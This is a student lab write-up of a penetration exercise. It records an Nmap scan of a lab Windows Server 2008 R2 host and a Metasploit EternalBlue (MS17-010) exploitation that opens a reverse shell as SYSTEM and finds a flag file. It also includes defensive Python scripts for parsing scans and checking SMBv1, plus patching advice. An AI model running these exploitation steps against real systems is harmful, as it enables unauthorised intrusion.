
Secure Admin Tools – Lab Exercise 8 + 9

tags: fh SAT

© Aymeric Hollaus, Sebastian Doiber, Johannes Schwinger

Procedure

To do anything on the target we first had to connect to the FH Campus server with our student ID, using an SSH client.
The first step of the lab was a port scan with Nmap, which showed every open port and the service listening behind it.
To find possible exploits we researched the services and the OS that the Nmap scan revealed.
When we found a candidate exploit, we used Metasploit to check whether it actually works against the host.

Setup

Starting Metasploit

1810475***@secat:~$ msfconsole

Information Gathering

Port Scan

1810475041@secat:~$ nmap -A 172.16.51.112
Starting Nmap 7.80 ( https://nmap.org ) at 2020-06-16 12:31 UTC
Nmap scan report for 172.16.51.112
Host is up (0.00023s latency).
Not shown: 982 closed ports
PORT      STATE SERVICE            VERSION
22/tcp    open  ssh                WeOnlyDo sshd 2.4.3 (protocol 2.0)
| ssh-hostkey:
|   1024 13:06:ce:41:ba:15:7c:c9:bc:03:6f:75:8a:77:d4:b4 (DSA)
|_  1024 0c:6b:d1:48:6e:70:f8:25:64:df:5b:df:56:c3:8a:69 (RSA)
80/tcp    open  http               Microsoft IIS httpd 7.5
| http-methods:
|_  Potentially risky methods: TRACE
|_http-server-header: Microsoft-IIS/7.5
|_http-title: IIS7
111/tcp   open  rpcbind            2-4 (RPC #100000)
| rpcinfo:
|   program version    port/proto  service
|   100000  2,3,4        111/tcp   rpcbind
|   100000  2,3,4        111/tcp6  rpcbind
|   100000  2,3,4        111/udp   rpcbind
|   100000  2,3,4        111/udp6  rpcbind
|   100003  2,3         2049/tcp   nfs
|   100003  2,3         2049/tcp6  nfs
|   100003  2,3         2049/udp   nfs
|   100003  2,3         2049/udp6  nfs
|   100005  1,2,3       1048/tcp   mountd
|   100005  1,2,3       1048/tcp6  mountd
|   100005  1,2,3       1048/udp   mountd
|   100005  1,2,3       1048/udp6  mountd
|   100021  1,2,3,4     1047/tcp   nlockmgr
|   100021  1,2,3,4     1047/tcp6  nlockmgr
|   100021  1,2,3,4     1047/udp   nlockmgr
|   100021  1,2,3,4     1047/udp6  nlockmgr
|   100024  1           1039/tcp   status
|   100024  1           1039/tcp6  status
|   100024  1           1039/udp   status
|_  100024  1           1039/udp6  status
135/tcp   open  msrpc              Microsoft Windows RPC
139/tcp   open  netbios-ssn        Microsoft Windows netbios-ssn
443/tcp   open  ssl/http           Microsoft IIS httpd 7.5
| http-methods:
|_  Potentially risky methods: TRACE
|_http-server-header: Microsoft-IIS/7.5
|_http-title: IIS7
| ssl-cert: Subject: commonName=WIN-4V8K6ED3C90
| Not valid before: 2020-05-25T11:00:23
|_Not valid after:  2030-05-25T00:00:00
|_ssl-date: 2020-06-16T12:33:02+00:00; -2s from scanner time.
| sslv2:
|   SSLv2 supported
|   ciphers:
|     SSL2_RC4_128_WITH_MD5
|_    SSL2_DES_192_EDE3_CBC_WITH_MD5
445/tcp   open  microsoft-ds       Windows Server 2008 R2 Standard 7601 Service Pack 1 microsoft-ds (workgroup: WORKGROUP)
593/tcp   open  ncacn_http         Microsoft Windows RPC over HTTP 1.0
1039/tcp  open  status             1 (RPC #100024)
1047/tcp  open  nlockmgr           1-4 (RPC #100021)
1048/tcp  open  mountd             1-3 (RPC #100005)
2049/tcp  open  nfs                2-3 (RPC #100003)
3389/tcp  open  ssl/ms-wbt-server?
| rdp-ntlm-info:
|   Target_Name: WIN-4V8K6ED3C90
|   NetBIOS_Domain_Name: WIN-4V8K6ED3C90
|   NetBIOS_Computer_Name: WIN-4V8K6ED3C90
|   DNS_Domain_Name: WIN-4V8K6ED3C90
|   DNS_Computer_Name: WIN-4V8K6ED3C90
|   Product_Version: 6.1.7601
|_  System_Time: 2020-06-16T12:32:57+00:00
| ssl-cert: Subject: commonName=WIN-4V8K6ED3C90
| Not valid before: 2020-05-24T11:00:21
|_Not valid after:  2020-11-23T11:00:21
|_ssl-date: 2020-06-16T12:33:02+00:00; -2s from scanner time.
49152/tcp open  msrpc              Microsoft Windows RPC
49153/tcp open  msrpc              Microsoft Windows RPC
49154/tcp open  msrpc              Microsoft Windows RPC
49155/tcp open  msrpc              Microsoft Windows RPC
49176/tcp open  msrpc              Microsoft Windows RPC
Service Info: Host: WIN-4V8K6ED3C90; OS: Windows; CPE: cpe:/o:microsoft:windows

Host script results:
|_clock-skew: mean: -20m02s, deviation: 48m59s, median: -2s
|_nbstat: NetBIOS name: nil, NetBIOS user: <unknown>, NetBIOS MAC: 06:ae:6b:09:76:b2 (unknown)
| smb-os-discovery:
|   OS: Windows Server 2008 R2 Standard 7601 Service Pack 1 (Windows Server 2008 R2 Standard 6.1)
|   OS CPE: cpe:/o:microsoft:windows_server_2008::sp1
|   Computer name: WIN-4V8K6ED3C90
|   NetBIOS computer name: WIN-4V8K6ED3C90\x00
|   Workgroup: WORKGROUP\x00
|_  System time: 2020-06-16T14:32:57+02:00
| smb-security-mode:
|   account_used: guest
|   authentication_level: user
|   challenge_response: supported
|_  message_signing: disabled (dangerous, but default)
| smb2-security-mode:
|   2.02:
|_    Message signing enabled but not required
| smb2-time:
|   date: 2020-06-16T12:32:57
|_  start_date: 2020-06-12T15:15:21

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 87.88 seconds

Ports & Services

IP: 172.16.51.112

Ping? HOST IS UP

HOSTNAME = WIN-4V8K6ED3C90

OPEN PORTS
22 SSH
80 HTTP
111 RPCBIND
135 MSRPC
139 NETBIOS-SSN
443 SSL/HTTP
445 MICROSOFT DS > DONE! ETERNAL BLUE
593 NCACN_HTTP
1039 STATUS
1047 NLOCKMGR
1048 MOUNTD
2049 NFS
3389 SSL/MS-WBT-SERVER?
49152 MSRPC
49153 MSRPC
49154 MSRPC
49155 MSRPC
49176 MSRPC

Interpretation of gathered information

OS: Windows Server 2008 R2 Standard 7601 Service Pack 1 (Windows Server 2008 R2 Standard 6.1)

Based on the service list we researched the potential security risks of each service and of the detected OS.
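The port summary above was compiled by hand from the nmap -A output. As an added example (not part of the original lab report), the following Python script parses nmap's normal output into a port/service list, pulls the OS hint from the Service Info line, and flags the script-output indicators from this scan that are worth following up during vulnerability analysis (SSLv2 offered, HTTP TRACE enabled, SMB signing disabled). The embedded scan text is an abridged copy of the output above; the risk rules are our own selection for this lab and not something nmap emits.

```python
import re

# Abridged copy of this lab's "nmap -A 172.16.51.112" output, embedded as a constructed sample input.
SAMPLE_NMAP = """\
Nmap scan report for 172.16.51.112
Host is up (0.00023s latency).
Not shown: 982 closed ports
PORT      STATE SERVICE            VERSION
22/tcp    open  ssh                WeOnlyDo sshd 2.4.3 (protocol 2.0)
80/tcp    open  http               Microsoft IIS httpd 7.5
| http-methods:
|_  Potentially risky methods: TRACE
443/tcp   open  ssl/http           Microsoft IIS httpd 7.5
| sslv2:
|   SSLv2 supported
445/tcp   open  microsoft-ds       Windows Server 2008 R2 Standard 7601 Service Pack 1 microsoft-ds (workgroup: WORKGROUP)
2049/tcp  open  nfs                2-3 (RPC #100003)
3389/tcp  open  ssl/ms-wbt-server?
Service Info: Host: WIN-4V8K6ED3C90; OS: Windows; CPE: cpe:/o:microsoft:windows

Host script results:
| smb-security-mode:
|_  message_signing: disabled (dangerous, but default)
"""

# One "port/proto  state  service  version" row of nmap's normal output.
PORT_RE = re.compile(r"^(\d+)/(tcp|udp)\s+(\S+)\s+(\S+)\s*(.*)$")
# The OS hint nmap prints in its "Service Info:" summary line.
OS_RE = re.compile(r"^Service Info:.*?OS: ([^;]+)")

# Indicators in NSE script output that deserve a follow-up. This is our own
# selection for this lab (an assumption of the example), not an nmap feature.
RISK_RULES = [
    (r"SSLv2 supported", "SSLv2 offered (obsolete protocol, weak ciphers)"),
    (r"Potentially risky methods: TRACE", "HTTP TRACE enabled"),
    (r"message_signing: disabled", "SMB signing disabled (relay-friendly)"),
]


def parse_nmap(text):
    """Parse nmap normal output into ports (with attached script lines), host scripts and OS hint."""
    ports, host_scripts, os_hint = [], [], None
    current = None            # script lines ("| ...") attach to the most recent port row
    in_host_scripts = False
    for line in text.splitlines():
        m = PORT_RE.match(line)
        if m:
            port, proto, state, service, version = m.groups()
            current = {"port": int(port), "proto": proto, "state": state,
                       "service": service, "version": version, "scripts": []}
            ports.append(current)
            continue
        m = OS_RE.match(line)
        if m:
            os_hint = m.group(1).strip()
            continue
        if line.startswith("Host script results"):
            in_host_scripts = True   # everything after this belongs to the host, not a port
            current = None
            continue
        if line.startswith("|"):
            body = line.lstrip("|_ ").rstrip()
            if in_host_scripts:
                host_scripts.append(body)
            elif current is not None:
                current["scripts"].append(body)
    return {"ports": ports, "host_scripts": host_scripts, "os": os_hint}


def open_ports(scan):
    """The (port, service) pairs in state 'open', i.e. the hand-written OPEN PORTS list."""
    return [(p["port"], p["service"]) for p in scan["ports"] if p["state"] == "open"]


def flag_risks(scan):
    """Apply RISK_RULES to per-port and host-level script output; None marks a host-level finding."""
    findings = []
    for p in scan["ports"]:
        for pattern, description in RISK_RULES:
            if any(re.search(pattern, s) for s in p["scripts"]):
                findings.append((p["port"], description))
    for pattern, description in RISK_RULES:
        if any(re.search(pattern, s) for s in scan["host_scripts"]):
            findings.append((None, description))
    return findings


if __name__ == "__main__":
    scan = parse_nmap(SAMPLE_NMAP)
    print("OS:", scan["os"])
    for port, service in open_ports(scan):
        print(f"{port:>5}  {service}")
    for port, description in flag_risks(scan):
        print("FLAG", port if port is not None else "host", description)
```

To run it on a real scan, save the nmap output with `-oN scan.txt` and pass the file contents to `parse_nmap`; the grepable (`-oG`) and XML (`-oX`) formats are easier to parse in general, but this mirrors what we read off the screen during the lab.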

Vulnerability Analysis

Tried modules

  • scanner/http/trace_axd
  • auxiliary/scanner/http/trace
  • windows/nfs/xlink_nfsd
  • windows/ftp/oracle9i_xdb_ftp_unlock
  • post/windows/gather/credentials/mdaemon_cred_collector
  • multi/http/tomcat_mgr_deploy
  • windows/ssh/freesshd_authbypass
  • exploit/windows/ssh/freeftpd_key_exchange
  • exploit/windows/ssh/freesshd_key_exchange
  • windows/iis/iis_webdav_upload_asp
  • scanner/http/iis_shortname_scanner
  • scanner/http/iis_internal_ip

Successes

EternalBlue (MS17-010)

msf5 auxiliary(scanner/smb/smb_ms17_010) > show options

Module options (auxiliary/scanner/smb/smb_ms17_010):

   Name         Current Setting                                                              Required  Description
   ----         ---------------                                                              --------  -----------
   CHECK_ARCH   true                                                                         no        Check for architecture on vulnerable hosts
   CHECK_DOPU   true                                                                         no        Check for DOUBLEPULSAR on vulnerable hosts
   CHECK_PIPE   false                                                                        no        Check for named pipe on vulnerable hosts
   NAMED_PIPES  /opt/metasploit-framework/embedded/framework/data/wordlists/named_pipes.txt  yes       List of named pipes to check
   RHOSTS       172.16.51.112                                                                yes       The target host(s), range CIDR identifier, or hosts file with syntax 'file:<path>'
   RPORT        445                                                                          yes       The SMB service port (TCP)
   SMBDomain    .                                                                            no        The Windows domain to use for authentication
   SMBPass                                                                                   no        The password for the specified username
   SMBUser                                                                                   no        The username to authenticate as
   THREADS      1                                                                            yes       The number of concurrent threads (max one per host)

msf5 auxiliary(scanner/smb/smb_ms17_010) > exploit

[+] 172.16.51.112:445     - Host is likely VULNERABLE to MS17-010! - Windows Server 2008 R2 Standard 7601 Service Pack 1 x64 (64-bit)
[*] 172.16.51.112:445     - Scanned 1 of 1 hosts (100% complete)
[*] Auxiliary module execution completed
msf5 auxiliary(scanner/smb/smb_ms17_010) > back
msf5 > use exploit/windows/smb/ms17_010_eternalblue
msf5 exploit(windows/smb/ms17_010_eternalblue) > set rhosts 172.16.51.112
rhosts => 172.16.51.112
msf5 exploit(windows/smb/ms17_010_eternalblue) > show options

Module options (exploit/windows/smb/ms17_010_eternalblue):

   Name           Current Setting  Required  Description
   ----           ---------------  --------  -----------
   RHOSTS         172.16.51.112    yes       The target host(s), range CIDR identifier, or hosts file with syntax 'file:<path>'
   RPORT          445              yes       The target port (TCP)
   SMBDomain      .                no        (Optional) The Windows domain to use for authentication
   SMBPass                         no        (Optional) The password for the specified username
   SMBUser                         no        (Optional) The username to authenticate as
   VERIFY_ARCH    true             yes       Check if remote architecture matches exploit Target.
   VERIFY_TARGET  true             yes       Check if remote OS matches exploit Target.


Exploit target:

   Id  Name
   --  ----
   0   Windows 7 and Server 2008 R2 (x64) All Service Packs


msf5 exploit(windows/smb/ms17_010_eternalblue) > exploit

[-] Handler failed to bind to 172.16.51.103:4444:-  -
[-] Handler failed to bind to 0.0.0.0:4444:-  -
[-] 172.16.51.112:445 - Exploit failed [bad-config]: Rex::BindFailed The address is already in use or unavailable: (0.0.0.0:4444).
[*] Exploit completed, but no session was created.
msf5 exploit(windows/smb/ms17_010_eternalblue) > ipconfig
^CInterrupt: use the 'exit' command to quit
msf5 exploit(windows/smb/ms17_010_eternalblue) > set lhosts 172.16.51.103
lhosts => 172.16.51.103
msf5 exploit(windows/smb/ms17_010_eternalblue) > run

[*] Started reverse TCP handler on 172.16.51.103:4444
[*] 172.16.51.112:445 - Using auxiliary/scanner/smb/smb_ms17_010 as check
[+] 172.16.51.112:445     - Host is likely VULNERABLE to MS17-010! - Windows Server 2008 R2 Standard 7601 Service Pack 1 x64 (64-bit)
[*] 172.16.51.112:445     - Scanned 1 of 1 hosts (100% complete)
[*] 172.16.51.112:445 - Connecting to target for exploitation.
[+] 172.16.51.112:445 - Connection established for exploitation.
[+] 172.16.51.112:445 - Target OS selected valid for OS indicated by SMB reply
[*] 172.16.51.112:445 - CORE raw buffer dump (51 bytes)
[*] 172.16.51.112:445 - 0x00000000  57 69 6e 64 6f 77 73 20 53 65 72 76 65 72 20 32  Windows Server 2
[*] 172.16.51.112:445 - 0x00000010  30 30 38 20 52 32 20 53 74 61 6e 64 61 72 64 20  008 R2 Standard
[*] 172.16.51.112:445 - 0x00000020  37 36 30 31 20 53 65 72 76 69 63 65 20 50 61 63  7601 Service Pac
[*] 172.16.51.112:445 - 0x00000030  6b 20 31                                         k 1
[+] 172.16.51.112:445 - Target arch selected valid for arch indicated by DCE/RPC reply
[*] 172.16.51.112:445 - Trying exploit with 12 Groom Allocations.
[*] 172.16.51.112:445 - Sending all but last fragment of exploit packet
[*] 172.16.51.112:445 - Starting non-paged pool grooming
[+] 172.16.51.112:445 - Sending SMBv2 buffers
[+] 172.16.51.112:445 - Closing SMBv1 connection creating free hole adjacent to SMBv2 buffer.
[*] 172.16.51.112:445 - Sending final SMBv2 buffers.
[*] 172.16.51.112:445 - Sending last fragment of exploit packet!
[*] 172.16.51.112:445 - Receiving response from exploit packet
[+] 172.16.51.112:445 - ETERNALBLUE overwrite completed successfully (0xC000000D)!
[*] 172.16.51.112:445 - Sending egg to corrupted connection.
[*] 172.16.51.112:445 - Triggering free of corrupted buffer.
[*] Command shell session 1 opened (172.16.51.103:4444 -> 172.16.51.112:49276) at 2020-06-16 14:28:14 +0000
[+] 172.16.51.112:445 - =-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
[+] 172.16.51.112:445 - =-=-=-=-=-=-=-=-=-=-=-=-=-WIN-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
[+] 172.16.51.112:445 - =-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=



C:\Windows\system32>sysinfo
sysinfo
'sysinfo' is not recognized as an internal or external command,
operable program or batch file.

C:\Windows\system32>getuid
getuid
'getuid' is not recognized as an internal or external command,
operable program or batch file.

C:\Windows\system32>ls
ls
'ls' is not recognized as an internal or external command,
operable program or batch file.

C:\Windows\system32>sysinfo
sysinfo
'sysinfo' is not recognized as an internal or external command,
operable program or batch file.

C:\Windows\system32>exit
exit


^C
Abort session 1? [y/N]  y
""

[*] 172.16.51.112 - Command shell session 1 closed.  Reason: User exit
msf5 exploit(windows/smb/ms17_010_eternalblue) > run

[*] Started reverse TCP handler on 172.16.51.103:4444
[*] 172.16.51.112:445 - Using auxiliary/scanner/smb/smb_ms17_010 as check
[+] 172.16.51.112:445     - Host is likely VULNERABLE to MS17-010! - Windows Server 2008 R2 Standard 7601 Service Pack 1 x64 (64-bit)
[*] 172.16.51.112:445     - Scanned 1 of 1 hosts (100% complete)
[*] 172.16.51.112:445 - Connecting to target for exploitation.
[+] 172.16.51.112:445 - Connection established for exploitation.
[+] 172.16.51.112:445 - Target OS selected valid for OS indicated by SMB reply
[*] 172.16.51.112:445 - CORE raw buffer dump (51 bytes)
[*] 172.16.51.112:445 - 0x00000000  57 69 6e 64 6f 77 73 20 53 65 72 76 65 72 20 32  Windows Server 2
[*] 172.16.51.112:445 - 0x00000010  30 30 38 20 52 32 20 53 74 61 6e 64 61 72 64 20  008 R2 Standard
[*] 172.16.51.112:445 - 0x00000020  37 36 30 31 20 53 65 72 76 69 63 65 20 50 61 63  7601 Service Pac
[*] 172.16.51.112:445 - 0x00000030  6b 20 31                                         k 1
[+] 172.16.51.112:445 - Target arch selected valid for arch indicated by DCE/RPC reply
[*] 172.16.51.112:445 - Trying exploit with 12 Groom Allocations.
[*] 172.16.51.112:445 - Sending all but last fragment of exploit packet
[*] 172.16.51.112:445 - Starting non-paged pool grooming
[+] 172.16.51.112:445 - Sending SMBv2 buffers
[+] 172.16.51.112:445 - Closing SMBv1 connection creating free hole adjacent to SMBv2 buffer.
[*] 172.16.51.112:445 - Sending final SMBv2 buffers.
[*] 172.16.51.112:445 - Sending last fragment of exploit packet!
[*] 172.16.51.112:445 - Receiving response from exploit packet
[+] 172.16.51.112:445 - ETERNALBLUE overwrite completed successfully (0xC000000D)!
[*] 172.16.51.112:445 - Sending egg to corrupted connection.
[*] 172.16.51.112:445 - Triggering free of corrupted buffer.
[-] 172.16.51.112:445 - =-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
[-] 172.16.51.112:445 - =-=-=-=-=-=-=-=-=-=-=-=-=-=FAIL-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
[-] 172.16.51.112:445 - =-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
[*] 172.16.51.112:445 - Connecting to target for exploitation.
[+] 172.16.51.112:445 - Connection established for exploitation.
[+] 172.16.51.112:445 - Target OS selected valid for OS indicated by SMB reply
[*] 172.16.51.112:445 - CORE raw buffer dump (51 bytes)
[*] 172.16.51.112:445 - 0x00000000  57 69 6e 64 6f 77 73 20 53 65 72 76 65 72 20 32  Windows Server 2
[*] 172.16.51.112:445 - 0x00000010  30 30 38 20 52 32 20 53 74 61 6e 64 61 72 64 20  008 R2 Standard
[*] 172.16.51.112:445 - 0x00000020  37 36 30 31 20 53 65 72 76 69 63 65 20 50 61 63  7601 Service Pac
[*] 172.16.51.112:445 - 0x00000030  6b 20 31                                         k 1
[+] 172.16.51.112:445 - Target arch selected valid for arch indicated by DCE/RPC reply
[*] 172.16.51.112:445 - Trying exploit with 17 Groom Allocations.
[*] 172.16.51.112:445 - Sending all but last fragment of exploit packet
[*] 172.16.51.112:445 - Starting non-paged pool grooming
[+] 172.16.51.112:445 - Sending SMBv2 buffers
[+] 172.16.51.112:445 - Closing SMBv1 connection creating free hole adjacent to SMBv2 buffer.
[*] 172.16.51.112:445 - Sending final SMBv2 buffers.
[*] 172.16.51.112:445 - Sending last fragment of exploit packet!
[*] 172.16.51.112:445 - Receiving response from exploit packet
[+] 172.16.51.112:445 - ETERNALBLUE overwrite completed successfully (0xC000000D)!
[*] 172.16.51.112:445 - Sending egg to corrupted connection.
[*] 172.16.51.112:445 - Triggering free of corrupted buffer.
[*] Command shell session 2 opened (172.16.51.103:4444 -> 172.16.51.112:49277) at 2020-06-16 14:33:27 +0000
[+] 172.16.51.112:445 - =-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
[+] 172.16.51.112:445 - =-=-=-=-=-=-=-=-=-=-=-=-=-WIN-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
[+] 172.16.51.112:445 - =-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=


C:\Windows\system32>whoami
whoami
nt authority\system

C:\Windows\system32>hostname
hostname
WIN-4V8K6ED3C90

C:\Windows\system32>

What does this exploit allow us to do?

This exploit gives the attacker, without any credentials, a command shell running as NT AUTHORITY\SYSTEM (see the whoami output above), i.e. full control of the machine.

How to prevent the attack?

Make sure your system has the latest security updates installed; for this host that means the MS17-010 patch.
For more information on how to fix the problem easily, we provided a link for you.

If, for some reason, that is not possible, other mitigations include disabling SMBv1 and not exposing vulnerable machines to the internet.
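One way to verify that SMBv1 really is disabled after applying that mitigation, as an added example that is not part of the original report: the script below sends a bare SMB1 Negotiate Protocol request that offers only the NT LM 0.12 dialect. A host that still speaks SMBv1 answers with an SMB1 Negotiate response whose DialectIndex is not 0xFFFF; a host with SMBv1 disabled rejects the dialect or simply drops the connection. The target address, the `smb1_enabled` helper and the constructed reply used for offline testing are assumptions of this example, not captured traffic.

```python
import socket
import struct

SMB1_MAGIC = b"\xffSMB"
SMB_COM_NEGOTIATE = 0x72
NO_DIALECT = 0xFFFF     # DialectIndex returned when the server accepts none of the offered dialects

# SMB1 header, 32 bytes little-endian: Protocol, Command, NT Status, Flags, Flags2,
# PIDHigh, SecurityFeatures, Reserved, TID, PID, UID, MID
SMB1_HEADER = struct.Struct("<4sBIBHHQHHHHH")


def build_smb1_negotiate(dialects=("NT LM 0.12",)):
    """Build a NetBIOS-framed SMB_COM_NEGOTIATE request offering only SMBv1 dialects."""
    header = SMB1_HEADER.pack(SMB1_MAGIC, SMB_COM_NEGOTIATE, 0, 0x18, 0xC853,
                              0, 0, 0, 0, 0xFEFF, 0, 0)
    # Each dialect is a BufferFormat byte 0x02 followed by a NUL-terminated string.
    data = b"".join(b"\x02" + d.encode("ascii") + b"\x00" for d in dialects)
    body = struct.pack("<BH", 0, len(data)) + data       # WordCount = 0, ByteCount, dialect list
    smb = header + body
    return b"\x00" + len(smb).to_bytes(3, "big") + smb   # NetBIOS session message header


def parse_smb1_negotiate_response(raw):
    """Return (smb1_accepted, dialect_index) from a raw NetBIOS-framed reply."""
    smb = raw[4:]
    if len(smb) < SMB1_HEADER.size + 3:                  # header + WordCount + DialectIndex
        return False, None
    proto, command, status = struct.unpack_from("<4sBI", smb, 0)
    if proto != SMB1_MAGIC or command != SMB_COM_NEGOTIATE or status != 0:
        return False, None                               # SMB2 reply, error, or garbage
    word_count = smb[SMB1_HEADER.size]
    if word_count == 0:
        return False, None
    dialect_index = struct.unpack_from("<H", smb, SMB1_HEADER.size + 1)[0]
    return dialect_index != NO_DIALECT, dialect_index


def smb1_enabled(host, port=445, timeout=5.0):
    """Connect to host:port and report whether it still negotiates SMBv1."""
    try:
        with socket.create_connection((host, port), timeout=timeout) as sock:
            sock.sendall(build_smb1_negotiate())
            raw = sock.recv(4096)
    except (ConnectionResetError, socket.timeout, OSError):
        return False        # hosts with SMBv1 disabled typically just drop the connection
    return parse_smb1_negotiate_response(raw)[0]


def constructed_negotiate_reply(dialect_index):
    """Constructed sample of an SMB1 Negotiate response, for offline testing only."""
    header = SMB1_HEADER.pack(SMB1_MAGIC, SMB_COM_NEGOTIATE, 0, 0x98, 0xC853,
                              0, 0, 0, 0, 0xFEFF, 0, 0)
    words = struct.pack("<H", dialect_index) + b"\x00" * 32   # 17 words; only DialectIndex matters here
    smb = header + bytes([17]) + words + struct.pack("<H", 0)  # WordCount, words, ByteCount = 0
    return b"\x00" + len(smb).to_bytes(3, "big") + smb


if __name__ == "__main__":
    import sys
    target = sys.argv[1] if len(sys.argv) > 1 else "172.16.51.112"   # lab host from the scan above
    print(f"{target}: SMBv1 {'ENABLED' if smb1_enabled(target) else 'not negotiated'}")
```

This only tells you whether the SMBv1 dialect is still accepted; it says nothing about whether the MS17-010 patch is installed. For that, re-run the auxiliary/scanner/smb/smb_ms17_010 check from the Successes section, which should no longer report the host as vulnerable after patching.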

Hashdump cracking


We tried to extract the password for "guest" from a hashdump, which worked, revealing that the "guest" user had no password. But the same method did not work on the "admin" user (probably because it was salted).

flag.txt

C:\>dir /b/s *.txt
dir /b/s *.txt
C:\ProcessList.txt
C:\Program Files\Windows NT\TableTextService\TableTextServiceAmharic.txt
C:\Program Files\Windows NT\TableTextService\TableTextServiceArray.txt
C:\Program Files\Windows NT\TableTextService\TableTextServiceDaYi.txt
[...]
C:\Users\Administrator\AppData\Roaming\Microsoft\Windows\Cookies\administrator@www.bing[1].txt
C:\Users\Administrator\Desktop\flag.txt
C:\Users\All Users\Microsoft\Windows\WER\ReportQueue\AppCrash_lsass.exe_eb79913b47a1b9451432438d2992459520a1762_cab_051410a1\WERFE6.tmp.appcompat.txt
[...]
C:\Windows\winsxs\x86_microsoft-windows-t..textservice-amharic_31bf3856ad364e35_6.1.7600.16385_none_6583d3f29e43cfa1\TableTextServiceAmharic.txt
C:\Windows\winsxs\x86_microsoft-windows-t..tional-chinese-dayi_31bf3856ad364e35_6.1.7600.16385_none_6052679946eea92d\TableTextServiceDaYi.txt